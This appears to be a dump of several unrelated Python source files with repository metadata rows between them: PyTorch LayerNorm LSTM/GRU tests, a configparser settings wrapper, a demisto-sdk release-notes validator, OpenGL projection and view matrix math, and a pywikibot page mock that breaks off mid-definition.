proj_size=proj_size,
ln=nn.Identity,
device=device,
)
torch.jit.script(lstm)
def test_layernorm_lstm_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_lstm = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_lstm.state_dict()) == len(torch_lstm.state_dict())
with torch.no_grad():
for name, param in self_lstm.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_lstm, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
hs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
cs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
states = list(zip(hs, cs))
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_lstm(x, states)
h = torch.stack(hs)
c = torch.stack(cs)
torch_y, (torch_h, torch_c) = torch_lstm(x_clone, (h, c))
assert_allclose(self_y, torch_y)
self_h = torch.stack([s[0] for s in self_states])
self_c = torch.stack([s[1] for s in self_states])
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
shc_sum = s_sum + self_h.sum() + self_c.sum()
thc_sum = t_sum + torch_h.sum() + torch_c.sum()
shc_sum.backward()
thc_sum.backward()
assert_allclose(x.grad, x_clone.grad)
def test_layernorm_lstm_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
proj_size=proj_size,
ln=nn.Identity,
device=device,
)
torch_lstm = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
proj_size=proj_size,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_lstm.state_dict()) == len(torch_lstm.state_dict())
with torch.no_grad():
for name, param in self_lstm.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_lstm, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
hs = [torch.rand(N, proj_size, device=device) for _ in range(num_layers)]
cs = [torch.rand(N, hidden_size, device=device) for _ in range(num_layers)]
states = list(zip(hs, cs))
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_lstm(x, states)
h = torch.stack(hs)
c = torch.stack(cs)
torch_y, (torch_h, torch_c) = torch_lstm(x_clone, (h, c))
assert_allclose(self_y, torch_y)
self_h = torch.stack([s[0] for s in self_states])
self_c = torch.stack([s[1] for s in self_states])
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
shc_sum = s_sum + self_h.sum() + self_c.sum()
thc_sum = t_sum + torch_h.sum() + torch_c.sum()
shc_sum.backward()
thc_sum.backward()
assert_allclose(x.grad, x_clone.grad)
def test_layernorm_gru_cell_jit(device="cpu"):
input_size = 10
hidden_size = 20
cell = LayerNormGRUCell(
input_size=input_size,
hidden_size=hidden_size,
bias=True,
device=device,
)
torch.jit.script(cell)
def test_layernorm_gru_cell_constructor(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
self_cell = LayerNormGRUCell(
input_size,
hidden_size,
ln=nn.Identity,
device=device,
)
torch_cell = nn.GRUCell(
input_size,
hidden_size,
).to(device)
for name, param in self_cell.named_parameters():
assert param.shape == getattr(torch_cell, name).shape
assert len(self_cell.state_dict()) == len(torch_cell.state_dict())
def test_layernorm_gru_cell_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_cell = LayerNormGRUCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_cell = nn.GRUCell(
input_size,
hidden_size,
bias=bias,
).to(device)
with torch.no_grad():
for name, torch_param in torch_cell.named_parameters():
self_param = getattr(self_cell, name)
torch_param.copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h = self_cell(x.clone(), h)
torch_h = torch_cell(x_clone, h)
assert_allclose(self_h, torch_h, atol=1e-5)
(
self_h.reshape(-1) * torch.arange(self_h.numel(), device=device)
).sum().backward()
(
torch_h.reshape(-1) * torch.arange(torch_h.numel(), device=device)
).sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-3)
def test_layernorm_gru_layer_jit(device="cpu"):
input_size = 10
hidden_size = 20
layer = LayerNormGRULayer(
input_size,
hidden_size=hidden_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_gru_layer_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_layer = LayerNormGRULayer(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, self_h = self_layer(x, h.clone())
torch_layer = nn.GRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, torch_h = torch_layer(x_clone, h.unsqueeze(0))
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
self_y_sum = (
self_y.reshape(-1) * torch.arange(self_y.numel(), device=device)
).sum()
torch_y_sum = (
torch_y.reshape(-1) * torch.arange(torch_y.numel(), device=device)
).sum()
self_y_sum.backward()
torch_y_sum.backward()
assert_allclose(x.grad, x_clone.grad, atol=0.1)
def test_layernorm_gru_jit(device="cpu"):
input_size = 2
hidden_size = 3
num_layers = 4
bias = True
gru = LayerNormGRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch.jit.script(gru)
def test_layernorm_gru_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
num_layers = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_gru = LayerNormGRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_gru = nn.GRU(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
bidirectional=False,
).to(device)
assert len(self_gru.state_dict()) == len(torch_gru.state_dict())
with torch.no_grad():
for name, param in self_gru.named_parameters():
# name has the form layers.0.cell.weight_hh
parts = name.split(".")
layer_num = parts[1]
getattr(torch_gru, f"{parts[-1]}_l{layer_num}").copy_(param)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
states = [
torch.rand(N, hidden_size, device=device) for _ in range(num_layers)
]
x_clone = x.detach().clone().requires_grad_()
self_y, self_states = self_gru(x, states)
torch_y, torch_states = torch_gru(x_clone, torch.stack(states))
assert_allclose(self_y, torch_y)
self_states = torch.stack(self_states)
assert_allclose(self_states, torch_states)
s = self_y.reshape(-1)
t = torch_y.reshape(-1)
s_sum = (s * torch.arange(s.numel(), device=device)).sum()
t_sum = (t * torch.arange(t.numel(), device=device)).sum()
s_state_sum = s_sum + self_states.sum()
t_state_sum = t_sum + torch_states.sum()
s_state_sum.backward()
t_state_sum.backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-2)
def _test_lstm(device):
test_layernorm_lstm_cell_jit(device)
test_layernorm_lstm_cell_constructor(device)
test_layernorm_lstm_cell_with_projection_jit(device)
test_layernorm_lstm_cell_forward(device)
test_layernorm_lstm_cell_with_projection_forward(device)
#
test_layernorm_lstm_layer_jit(device)
test_layernorm_lstm_layer_with_project_jit(device)
test_layernorm_lstm_layer_forward(device)
test_layernorm_lstm_layer_with_projection_forward(device)
test_layernorm_lstm_jit(device)
test_layernorm_lstm_with_projection_jit(device)
test_layernorm_lstm_forward(device)
test_layernorm_lstm_with_projection_forward(device)
def _test_gru(device):
test_layernorm_gru_cell_jit(device)
test_layernorm_gru_cell_constructor(device)
test_layernorm_gru_cell_forward(device)
#
test_layernorm_gru_layer_jit(device)
test_layernorm_gru_layer_forward(device)
#
test_layernorm_gru_jit(device)
test_layernorm_gru_forward(device)
torch.set_num_threads(1)
torch.set_num_interop_threads(1)
def main():
for device in get_devices():
print("device", device)
_test_lstm(device)
_test_gru(device)
if __name__ == "__main__":
torch.manual_seed(20211202)
main()
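# Editor's note: each test above copies the LayerNorm* module's parameters into
# the matching torch.nn implementation (with normalization disabled via
# ln=nn.Identity) and asserts that forward outputs and input gradients agree
# within tolerance, on CPU and, when available, CUDA.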
| 29.530026 | 79 | 0.642706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,128 | 0.049867 |
c7d594ecefc0ecfe585fc9557bf2ed8617f874e6 | 1,944 | py | Python | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
| 4 | 2015-12-22T15:03:43.000Z | 2016-07-28T08:11:48.000Z | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
| null | null | null | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
]
| null | null | null | import configparser
class Settings:
    '''The Settings class is a wrapper for configparser and its functions.
    This class simplifies the tasks of loading, storing and manipulating
    settings data.'''
def __init__(self, filename):
'''Create a new Settings object with a specific file name.'''
# Exceptions
self.__settingException = Exception(
'Cannot find specified setting data!')
# Settings variables
self.__filename = filename
self.__config = configparser.ConfigParser()
# Load settings from existing file (if one exists)
self.__isEmpty = len(self.__config.read(self.__filename)) == 0
def isEmpty(self):
        '''Return True if there is no settings data loaded, otherwise return
        False.'''
return self.__isEmpty
def addNewSetting(self, category, settingDict):
'''Add a new setting with the specified category and data. Save the new
settings data to a file.'''
self.__config[category] = settingDict.copy()
self.__saveAllSettings()
self.__isEmpty = False
def getSetting(self, category, key):
'''Return a setting value from the specified category and setting
key.'''
try:
return self.__config.get(category, key)
        except (KeyError, configparser.Error):  # configparser raises NoSectionError/NoOptionError, not KeyError
raise self.__settingException
def editSetting(self, category, key, value):
'''Change an existing setting with a specified category and setting key
to the value specified. Save the new settings data to a file.'''
try:
self.__config.set(category, key, str(value))
self.__saveAllSettings()
        except (KeyError, configparser.Error):  # configparser raises NoSectionError, not KeyError
raise self.__settingException
def __saveAllSettings(self):
'''Write the current settings data to a file.'''
with open(self.__filename, 'w') as configFile:
self.__config.write(configFile)
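
# Example usage (editor's sketch; the file name and keys below are invented).
# Guarded so that importing this module stays side-effect free:
if __name__ == '__main__':
    cfg = Settings('app.ini')
    if cfg.isEmpty():
        cfg.addNewSetting('Display', {'width': '640', 'height': '480'})
    cfg.editSetting('Display', 'width', 800)
    print(cfg.getSetting('Display', 'width'))  # configparser stores strings: '800'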
| 36.679245 | 79 | 0.646091 | 1,921 | 0.988169 | 0 | 0 | 0 | 0 | 0 | 0 | 816 | 0.419753 |
c7d59e3cde73fd0dad74b149197ee60ec8e8c83b | 3,900 | py | Python | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | demisto_sdk/commands/common/hook_validations/release_notes.py | yalonso7/demisto-sdk | 4b832078cdadb0b604a064532975e8be68ac726a | [
"MIT"
]
| null | null | null | from __future__ import print_function
import itertools
from demisto_sdk.commands.common.constants import VALIDATED_PACK_ITEM_TYPES
from demisto_sdk.commands.common.errors import Errors
from demisto_sdk.commands.common.hook_validations.base_validator import \
BaseValidator
from demisto_sdk.commands.common.tools import (get_latest_release_notes_text,
get_release_notes_file_path)
from demisto_sdk.commands.update_release_notes.update_rn import UpdateRN
class ReleaseNotesValidator(BaseValidator):
"""Release notes validator is designed to ensure the existence and correctness of the release notes in content repo.
Attributes:
file_path (str): the path to the file we are examining at the moment.
release_notes_path (str): the path to the changelog file of the examined file.
latest_release_notes (str): the text of the UNRELEASED section in the changelog file.
master_diff (str): the changes in the changelog file compared to origin/master.
"""
def __init__(self, file_path, modified_files=None, pack_name=None, added_files=None, ignored_errors=None,
print_as_warnings=False):
super().__init__(ignored_errors=ignored_errors, print_as_warnings=print_as_warnings)
self.file_path = file_path
self.modified_files = modified_files
self.added_files = added_files
self.pack_name = pack_name
self.release_notes_path = get_release_notes_file_path(self.file_path)
self.latest_release_notes = get_latest_release_notes_text(self.release_notes_path)
def are_release_notes_complete(self):
is_valid = True
        modified_added_files = list(itertools.chain.from_iterable((self.added_files or [], self.modified_files or [])))  # materialized so the truthiness check below is meaningful
if modified_added_files:
for file in modified_added_files:
if not any(permitted_type in file for permitted_type in VALIDATED_PACK_ITEM_TYPES):
continue
elif self.pack_name in file:
update_rn_util = UpdateRN(pack=self.pack_name, pack_files=set(), update_type=None,
added_files=set())
file_name, file_type = update_rn_util.identify_changed_file_type(file)
if file_name and file_type:
if (file_type not in self.latest_release_notes) or (file_name not in self.latest_release_notes):
entity_name = update_rn_util.get_display_name(file)
error_message, error_code = Errors.missing_release_notes_entry(file_type, self.pack_name,
entity_name)
if self.handle_error(error_message, error_code, self.file_path):
is_valid = False
return is_valid
def has_release_notes_been_filled_out(self):
release_notes_comments = self.latest_release_notes
if len(release_notes_comments) == 0:
error_message, error_code = Errors.release_notes_file_empty()
if self.handle_error(error_message, error_code, file_path=self.file_path):
return False
elif '%%UPDATE_RN%%' in release_notes_comments:
error_message, error_code = Errors.release_notes_not_finished()
if self.handle_error(error_message, error_code, file_path=self.file_path):
return False
return True
def is_file_valid(self):
"""Checks if given file is valid.
Return:
bool. True if file's release notes are valid, False otherwise.
"""
validations = [
self.has_release_notes_been_filled_out(),
self.are_release_notes_complete()
]
return all(validations)
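
# Hypothetical usage (editor's sketch -- the pack layout and file names are
# invented for illustration):
#
#     validator = ReleaseNotesValidator(
#         'Packs/MyPack/ReleaseNotes/1_0_1.md',
#         modified_files=['Packs/MyPack/Integrations/MyIntegration/MyIntegration.yml'],
#         pack_name='MyPack',
#     )
#     assert validator.is_file_valid()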
| 50 | 120 | 0.661795 | 3,391 | 0.869487 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.164103 |
c7d5fc15217b2b0e024e35082215227dc7639d0e | 14,326 | py | Python | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | PyOpenGL/PyGame/ex06/src/mathematics.py | hoppfull/Legacy-Python | 43f465bfdb76c91f2ac16aabb0783fdf5f459adb | [
"MIT"
]
| null | null | null | import numpy as np
class ProjectionMatrix():
"""This matrix provides projection distortion.
Projection distortion is when things that are far away
appear smaller and things that are close appear bigger.
This works flawlessly so far. Takes in screen-size and
provides near- and far clipping. fov is field-of-view
and smaller values will make view zoom in. A value of 1
will provide a panorama image."""
def __init__(self, screen_size, zNear, zFar, fov):
        if fov >= 1: # Limit to 0.99 or we get an infinity error at 1.0; >1.0 gives strange results.
fov = 0.99999;
tanHalfFOV = np.tan(fov * np.pi / 2.0)
zRange = zNear - zFar;
self.projectionMatrix = np.array([
[ # Row 0:
screen_size[1] / (tanHalfFOV * screen_size[0]),
0,
0,
0
],
[ # Row 1:
0,
1.0 / tanHalfFOV,
0,
0
],
[ # Row 2:
0,
0,
(-zNear - zFar)/zRange,
2.0 * zFar * zNear / zRange
],
[ # Row 3:
0,
0,
1,
0
],
], dtype=np.float32)
def get(self):
return self.projectionMatrix
class ViewMatrix():
"""This matrix transform a model as if it's percieved by a
camera with a target 'self.t' in global world coordinates
and a position 'self.p' in global world coordinates. Global
coordinates are x=right, y=forth and z=up."""
def __init__(self, position):
self.p = vec3(position.x, position.y, position.z)
# target coordinates:
self.t = vec3(0, 0, 0)
# tolerance value:
self.tolerance = 0.5
"""The tolerance value is for testing when view lies within bounds.
In case of 'self.orbitTarget()', it's for testing when view gets too
close to target z-axis. In case of 'self.approachTarget()', it's for
testing when view gets too close to target coordinates."""
# Sensitivity value:
self.alpha = 0.01
"""The sensitivity value is for tuning how sensitive 'self.orbitTarget()'
and 'self.approachTarget()' are to user input."""
# Initialize the rotationMatrix as the identity matrix:
self.rotationMatrix = np.matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
], dtype=np.float32)
def translate(self, dp):
self.p = self.p.add(dp)
def setPos(self, p):
self.p = vec3(p.x, p.y, p.z)
def lookAt(self, target=None, up=None):
"""This function focuses the view on a target.
Tested and seem to work as it should... ........finally........"""
if target != None:
self.t = vec3(target.x, target.y, target.z)
f = self.t.sub(self.p).norm()
if up != None:
u = vec3(up.x, up.y, up.z).norm()
else:
u = vec3(0, 0, 1)
s = f.cross(u).norm() # f x u
u = s.cross(f) # s x f, automatically normalized
self.rotationMatrix = np.matrix([
[ s.x, s.y, s.z, 0],
[ u.x, u.y, u.z, 0],
[ f.x, f.y, f.z, 0],
[ 0, 0, 0, 1]], dtype=np.float32)
def approachTarget(self, amount):
"""This function approaches the view towards the target
when amount is positive and moves away from the target when
amount is negative. It will stay outside the self.tolerance
distance. When completely close to the target, view cannot
look up or down too much."""
if amount == 0:
# If amount is zero, do nothing.
return
if self.t.sub(self.p).mag()*(1 - amount) > 2.0*self.tolerance:
# If 'self.approachTarget()' will not take the view within twice the
# tolerance distance, approach the target by given amount:
self.p = self.p.add(self.t.sub(self.p).scale(amount))
def orbitTarget(self, axis):
if axis == (0, 0):
return # Do nothing
# Get target2camera-vector:
p = self.p.sub(self.t)
# Assign passed values to variables we can change if we have to:
axis_x = -axis[0]
        if axis[1] > 0.30/self.alpha:
            """If axis[1] gets bigger than 0.30 / self.alpha, we get strange results
            because the view can 'tunnel' over the boundary set when the view is
            getting close to the target z-axis. Changing the tolerance doesn't
            change it a whole lot, so axis[1] is clamped to +-0.30 / self.alpha,
            which is really large as it is."""
            axis_y = 0.3 / self.alpha
elif axis[1] < -0.30/self.alpha:
axis_y = -0.3 / self.alpha
else:
axis_y = axis[1]
if axis_y > 0 and p.z > 0:
"""Tests if user is trying to orbit the view up
and if the view is above the 'equator'. The second
test is to make sure the view doesn't get stuck
if it gets inside the tolerance bounds and can get back
out as long as it's trying to move away."""
if vec2(p.x, p.y).mag() < self.tolerance:
axis_y = 0
elif axis_y < 0 and p.z < 0:
"""Tests if user is trying to orbit the view down
and if the view is below the 'equator'. Same test
but for different case as the one above."""
if vec2(p.x, p.y).mag() < self.tolerance:
axis_y = 0
if axis_y == 0: #If the other axis is zero:
# Amount of rotation for target-cam x-axis: (longitude, west2east)
v = vec3(0, 0, 1) # v is up vector
rate = axis_x
elif axis_x == 0: #If the other axis is zero:
# Amount of rotation for target-cam y-axis: (latitude, south2north)
v = p.cross(vec3(0, 0, 1)).norm() # v is side vector
rate = axis_y
else: #If neither is zero
# u is up vector:
u = vec3(0, 0, axis_x)
# s is side vector:
s = p.cross(vec3(0, 0, 1)).norm().scale(axis_y)
# v is combined vector:
v = u.add(s).norm()
rate = abs(axis_x) + abs(axis_y)
sin = np.sin(self.alpha * rate)
cos = np.cos(self.alpha * rate)
rotateMatrix = np.matrix([
[ # Row 0:
( v.x*v.x*(1 - cos) + cos ),
( v.y*v.x*(1 - cos) - v.z*sin ),
( v.z*v.x*(1 - cos) + v.y*sin ),
0
],
[ # Row 1:
( v.x*v.y*(1 - cos) + v.z*sin ),
( v.y*v.y*(1 - cos) + cos ),
( v.z*v.y*(1 - cos) - v.x*sin ),
0
],
[ # Row 2:
( v.x*v.z*(1 - cos) - v.y*sin ),
( v.y*v.z*(1 - cos) + v.x*sin ),
( v.z*v.z*(1 - cos) + cos ),
0
],
[ # Row 3:
0,
0,
0,
1
],
], dtype=np.float32)
p = rotateMatrix.dot( np.array([p.x, p.y, p.z, 1.0]) ).getA()[0][0:3]
self.p = vec3(p[0], p[1], p[2]).add(self.t)
self.lookAt(self.t)
def get(self):
translationMatrix = np.matrix([
[1,0,0,-self.p.x],
[0,1,0,-self.p.y],
[0,0,1,-self.p.z],
[0,0,0,1]
], dtype=np.float32)
return (self.rotationMatrix*translationMatrix).getA()
class ModelMatrix():
"""This matrix transform a model into world coordinates.
Heavily tested and should work properly. Could probably
be optimized further or even translated into cython for
performance."""
def __init__(self, position):
self.p = vec3(position.x, position.y, position.z)
self.s = vec3(1, 1, 1)
self.rotationMatrix = np.matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
], dtype=np.float32)
def translate(self, dp):
self.p = self.p.add(dp)
def rotate(self, turns, unit):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
u = unit.norm()
sin = np.sin(turns * np.pi * 2)
cos = np.cos(turns * np.pi * 2)
self.rotationMatrix = self.rotationMatrix.dot(
np.matrix([
[ # Row 0:
( u.x*u.x*(1 - cos) + cos ),
( u.y*u.x*(1 - cos) - u.z*sin ),
( u.z*u.x*(1 - cos) + u.y*sin ),
0
],
[ # Row 1:
( u.x*u.y*(1 - cos) + u.z*sin ),
( u.y*u.y*(1 - cos) + cos ),
( u.z*u.y*(1 - cos) - u.x*sin ),
0
],
[ # Row 2:
( u.x*u.z*(1 - cos) - u.y*sin ),
( u.y*u.z*(1 - cos) + u.x*sin ),
( u.z*u.z*(1 - cos) + cos ),
0
],
[ # Row 3:
0,
0,
0,
1
],
], dtype=np.float32))
def scale(self, s):
self.s = vec3(s.x, s.y, s.z)
def lookAt(self, target, up=None):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
# Get normalized vector pointing from model to target
f = target.sub(self.p).norm()
if up != None:
u = vec3(up.x, up.y, up.z).norm()
else:
u = vec3(0, 0, 1)
s = f.cross(u).norm() # f x u
# s must be normalized! Consider when f and u are not perpendicular!
u = s.cross(f) # s x f, automatically normalized
self.rotationMatrix = np.matrix([
[ s.x, f.x, u.x, 0],
[ s.y, f.y, u.y, 0],
[ s.z, f.z, u.z, 0],
[ 0, 0, 0, 1]], dtype=np.float32)
def get(self):
"""Heavily tested and should work! Requires 'GL_TRUE'
to be passed to the uniform on shader program to work."""
translationMatrix = np.matrix([
[1,0,0,self.p.x],
[0,1,0,self.p.y],
[0,0,1,self.p.z],
[0,0,0,1]
], dtype=np.float32)
scaleMatrix = np.matrix([
[self.s.x,0,0,0],
[0,self.s.y,0,0],
[0,0,self.s.z,0],
[0,0,0,1]
], dtype=np.float32)
return (translationMatrix*self.rotationMatrix*scaleMatrix).getA()
class quaternion():
def __init__(self, x, y, z, w):
self.x = float(x)
self.y = float(y)
self.z = float(z)
self.w = float(w)
    def mag(self): # Get length of quaternion
        return np.sqrt(self.x*self.x + self.y*self.y + self.z*self.z + self.w*self.w)
    def norm(self): # Normalize quaternion
        m = self.mag()
        return quaternion(
            x= self.x / m,
            y= self.y / m,
            z= self.z / m,
            w= self.w / m)
def conjugate(self):
return quaternion(
x=-self.x,
y=-self.y,
z=-self.z,
w= self.w)
def xQ(self, q): # Multiply with quaternion
return quaternion(
x= self.x * q.w + self.w * q.x + self.y * q.z - self.z * q.y,
y= self.y * q.w + self.w * q.y + self.z * q.x - self.x * q.z,
z= self.z * q.w + self.w * q.z + self.x * q.y - self.y * q.x,
w= self.w * q.w - self.x * q.x - self.y * q.y - self.z * q.z)
def xV(self, v): # Multiply with vector
return quaternion(
x= self.w*v.x + self.y*v.z - self.z*v.y,
y= self.w*v.y + self.z*v.x - self.x*v.z,
z= self.w*v.z + self.x*v.y - self.y*v.x,
w=-self.x*v.x - self.y*v.y - self.z*v.z)
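# Illustrative note (an addition, not part of the original file): a unit
# quaternion q rotates a vector v via q * v * q.conjugate(); the rotated
# vector is the (x, y, z) part of the result. A sketch using the API above
# (vec3 is defined further down in this module):
#
#     q = quaternion(0, 0, np.sin(np.pi / 4), np.cos(np.pi / 4))  # 90 deg about z
#     r = q.xV(vec3(1, 0, 0)).xQ(q.conjugate())
#     # (r.x, r.y, r.z) is approximately (0, 1, 0)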
class vec2():
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def mag(self):
return np.sqrt(self.x*self.x + self.y*self.y)
def norm(self):
return vec2(
x= self.x / self.mag(),
y= self.y / self.mag())
class vec3():
def __init__(self, x, y, z):
self.x = float(x)
self.y = float(y)
self.z = float(z)
def cross(self, vector):
return vec3(
x= self.y*vector.z - self.z*vector.y,
y= self.z*vector.x - self.x*vector.z,
z= self.x*vector.y - self.y*vector.x)
def dot(self, vector):
return float( self.x*vector.x + self.y*vector.y + self.z*vector.z )
def mag(self):
return np.sqrt(self.x*self.x + self.y*self.y + self.z*self.z)
def norm(self):
return vec3(
x= self.x / self.mag(),
y= self.y / self.mag(),
z= self.z / self.mag())
def add(self, vector):
return vec3(
x= self.x + vector.x,
y= self.y + vector.y,
z= self.z + vector.z)
def sub(self, vector):
return vec3(
x= self.x - vector.x,
y= self.y - vector.y,
z= self.z - vector.z)
def scale(self, scalar):
return vec3(
self.x*scalar,
self.y*scalar,
self.z*scalar)
    def rotate(self, angle, axis):
        # A minimal sketch filling in the original stub, using Rodrigues'
        # rotation formula. The stub left units unspecified, so `angle` is
        # assumed here to be in radians; `axis` is normalized before use.
        u = axis.norm()
        sin = np.sin(angle)
        cos = np.cos(angle)
        return self.scale(cos).add(
            u.cross(self).scale(sin)).add(
            u.scale(u.dot(self) * (1 - cos)))
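if __name__ == '__main__':
    # Illustrative usage sketch (an addition, not part of the original file):
    # compose the three matrices into a model-view-projection product for a
    # hypothetical 800x600 viewport. All numeric values are assumptions.
    projection = ProjectionMatrix((800, 600), zNear=0.1, zFar=100.0, fov=0.5)
    view = ViewMatrix(vec3(0, -5, 2))
    view.lookAt(vec3(0, 0, 0))
    model = ModelMatrix(vec3(0, 0, 0))
    model.rotate(0.25, vec3(0, 0, 1))  # a quarter turn around the z-axis
    mvp = projection.get().dot(view.get()).dot(model.get())
    print(mvp)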
| 34.603865 | 100 | 0.454279 | 14,274 | 0.99637 | 0 | 0 | 0 | 0 | 0 | 0 | 3,986 | 0.278235 |
c7d672fb0397af44cf591c05913dd9f20b250483 | 1,652 | py | Python | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | ["MIT"] | 7 | 2015-01-23T17:24:04.000Z | 2022-01-12T16:54:24.000Z | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | ["MIT"] | 18 | 2017-12-09T01:11:23.000Z | 2021-09-22T13:26:24.000Z | test_utils/mocks.py | radomd92/botjagwar | 1dc96600c40041057a9f9afde38c31ca34b8db38 | ["MIT"] | 1 | 2015-06-22T02:17:55.000Z | 2015-06-22T02:17:55.000Z |
from xml.dom import minidom
import pywikibot
from api.decorator import time_this
SiteMock = pywikibot.Site
class PageMock(pywikibot.Page):
    """Mock of pywikibot.Page that serves page text from a local XML dump
    instead of contacting a live wiki."""
    def __init__(self, *args, **kwargs):
        super(PageMock, self).__init__(*args, **kwargs)
        self.filename = "test_data/test_pages_%s.xml" % self.site.lang
        # minidom.parse accepts a filename directly, which avoids leaking
        # an open file handle.
        self.parsed = minidom.parse(self.filename)
        self.pages = self.parsed.getElementsByTagName('page')
    def put(self, newtext, summary=None, watch=None, minor=True, botflag=None,
            force=False, asynchronous=False, callback=None, **kwargs):
        print('Saving page [[%s]] through put' % self.title())
    def save(self, summary=None, watch=None, minor=True, botflag=None,
             force=False, asynchronous=False, callback=None,
